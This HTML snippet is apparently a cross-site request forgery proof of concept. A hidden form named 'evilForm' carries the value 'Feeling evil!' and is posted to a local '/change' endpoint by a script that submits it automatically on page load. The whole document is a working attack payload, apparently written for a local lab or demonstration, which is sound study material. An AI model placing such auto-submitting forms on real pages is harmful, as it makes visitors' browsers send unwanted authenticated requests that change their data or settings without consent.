<form id="evilForm" action="http://localhost:4000/change" method="post">
    <input type="hidden" name="message" value="Feeling evil!"/>
</form>

<script>
    document.getElementById('evilForm').submit();
</script>